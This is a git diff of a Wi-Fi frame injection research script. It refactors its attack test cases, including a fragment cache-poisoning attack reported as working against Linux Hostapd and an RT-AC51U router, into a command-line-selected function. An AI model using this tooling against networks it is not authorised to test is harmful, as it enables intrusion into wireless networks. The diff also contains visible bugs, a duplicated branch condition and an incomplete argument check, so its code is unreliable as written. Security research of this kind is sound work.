diff --git a/research/inject.py b/research/inject.py index 395275b4c..4f42ceba3 100755 --- a/research/inject.py +++ b/research/inject.py @@ -164,7 +164,7 @@ class Test(metaclass=abc.ABCMeta): @abc.abstractmethod def check(self, p): - pass + return False class PingTest(Test): def __init__(self, ptype, fragments): @@ -178,6 +178,8 @@ class PingTest(Test): return self.check_fn(p) def generate(self, station): + log(STATUS, "Generating ping test", color="green") + # Generate the header and payload header, request, self.check_fn = generate_request(station, self.ptype) @@ -196,6 +198,12 @@ class LinuxTest(Test): Frag(Frag.Connected, False) ]) self.ptype = ptype + self.check_fn = None + + def check(self, p): + if self.check_fn == None: + return False + return self.check_fn(p) def generate(self, station): header, request, self.check_fn = generate_request(station, self.ptype) @@ -224,6 +232,12 @@ class MacOsTest(Test): Frag(Frag.BeforeAuth, False) ]) self.ptype = ptype + self.check_fn = None + + def check(self, p): + if self.check_fn == None: + return False + return self.check_fn(p) def generate(self, station): # First fragment is the start of an EAPOL frame @@ -236,7 +250,7 @@ class MacOsTest(Test): # By sending to broadcast, this fragment will not be reassembled # though, meaning it will be treated as a full frame (and not EAPOL). _, request, self.check_fn = generate_request(station, self.ptype) - frag2 = create_fragments(header, data=request, num_frags=1) + frag2, = create_fragments(header, data=request, num_frags=1) frag2.addr1 = "ff:ff:ff:ff:ff:ff" self.fragments[0].frame = frag1 @@ -272,9 +286,9 @@ class Station(): def __init__(self, daemon, mac, ds_status): self.daemon = daemon self.options = daemon.options + self.test = daemon.options.test self.txed_before_auth = False self.txed_before_auth_done = False - self.first_connect = True self.obtained_ip = False # Don't reset PN to have consistency over rekeys and reconnects @@ -315,7 +329,7 @@ class Station(): if self.test != None and self.test.check != None and self.test.check(p): log(STATUS, "SUCCESSFULL INJECTION", color="green") print(repr(p)) - self.test = Test() + self.test = None def send_mon(self, data, prior=1): """ @@ -385,40 +399,6 @@ class Station(): encrypted = encrypt_ccmp(frame, key, self.pn, keyid) return encrypted - def generate_tests(self): - # Simple ping as sanity check - self.test = PingTest(REQ_ICMP, - [Frag(Frag.Connected, True, flags=Frag.GetIp)]) - - # Cache poison attack. Worked against Linux Hostapd and RT-AC51U. - self.test = PingTest(REQ_ICMP, - [Frag(Frag.Connected, True), - Frag(Frag.Connected, True, flags=Frag.Reconnect)]) - - # Two fragments over different PTK keys - #self.test = self.generate_test_ping(REQ_DHCP, - # [Frag(Frag.BeforeAuth, True, wait_rekey=True), - # Frag(Frag.AfterAuth, True)]) - - # TODO: - # - Test case to check if the receiver supports interleaved priority - # reception. It seems Windows 10 / Intel might not support this. - # - Test case with a very lage aggregated frame (which is normally not - # allowed but some may accept it). And a variation to check how APs - # will forward such overly large frame (e.g. force fragmentation). - # - 1.1 Encrypted (= sanity ping test) - # 1.2 Plaintext (= text plaintext injection) - # 1.3 Encrpted, Encrypted - # 1.4 [TKIP] Encrpted, Encrypted, no global MIC - # 1.5 Plaintext, plaintext - # 1.6 Encrypted, plaintext - # 1.7 Plaintext, encrypted - # 1.8 Encrypted, plaintext, encrypted - # 1.9 Plaintext, encrypted, plaintext - # 2. Test 2 but first plaintext sent before installing key - - log(STATUS, "Constructed test case", color="green") - def handle_connecting(self, peermac): # If the address was already set, it should not be changing assert self.peermac == None or self.peermac == peermac @@ -428,16 +408,10 @@ class Station(): self.reset_keys() self.time_connected = None - # Generate test cases once we know the MAC addresses - # XXX TODO FIXME : Dynamically generate payloads when needed - if self.first_connect: - self.generate_tests() - self.first_connect = False - def inject_next_frags(self, trigger): frame = None - while self.test.next_trigger_is(trigger): + while self.test != None and self.test.next_trigger_is(trigger): Frag = self.test.next(self) if Frag.encrypted: assert self.tk != None and self.gtk != None @@ -500,6 +474,9 @@ class Station(): self.send_mon(eapol) def check_flags_and_inject(self, trigger): + if self.test == None: + return + flag = self.test.next_flag() if flag == Frag.GetIp: if self.obtained_ip: @@ -955,15 +932,57 @@ class Supplicant(Daemon): def cleanup(): daemon.stop() +def prepare_tests(test_id): + if test_id == 0: + # Simple ping as sanity check + test = PingTest(REQ_ICMP, + [Frag(Frag.Connected, True, flags=Frag.GetIp)]) + + elif test_id == 1: + # Cache poison attack. Worked against Linux Hostapd and RT-AC51U. + test = PingTest(REQ_ICMP, + [Frag(Frag.Connected, True), + Frag(Frag.Connected, True, flags=Frag.Reconnect)]) + + elif test_id == 1: + test = MacOsTest(REQ_DHCP) + + # Two fragments over different PTK keys + #self.test = self.generate_test_ping(REQ_DHCP, + # [Frag(Frag.BeforeAuth, True, wait_rekey=True), + # Frag(Frag.AfterAuth, True)]) + + # TODO: + # - Test case to check if the receiver supports interleaved priority + # reception. It seems Windows 10 / Intel might not support this. + # - Test case with a very lage aggregated frame (which is normally not + # allowed but some may accept it). And a variation to check how APs + # will forward such overly large frame (e.g. force fragmentation). + # - 1.1 Encrypted (= sanity ping test) + # 1.2 Plaintext (= text plaintext injection) + # 1.3 Encrpted, Encrypted + # 1.4 [TKIP] Encrpted, Encrypted, no global MIC + # 1.5 Plaintext, plaintext + # 1.6 Encrypted, plaintext + # 1.7 Plaintext, encrypted + # 1.8 Encrypted, plaintext, encrypted + # 1.9 Plaintext, encrypted, plaintext + # 2. Test 2 but first plaintext sent before installing key + + return test if __name__ == "__main__": - log(WARNING, "\nRemember to use a modified backports and ath9k_htc firmware!\n") + log(WARNING, "Remember to use a modified backports and ath9k_htc firmware!\n") if "--help" in sys.argv or "-h" in sys.argv: print("\nSee README.md for usage instructions.") quit(1) + elif len(sys.argv) < 2: + print(f"Usage: {sys.argv[0]} interface test_id") + quit(1) options = TestOptions() options.interface = sys.argv[1] + options.test = prepare_tests(int(sys.argv[2])) # Parse remaining options start_ap = argv_pop_argument("--ap")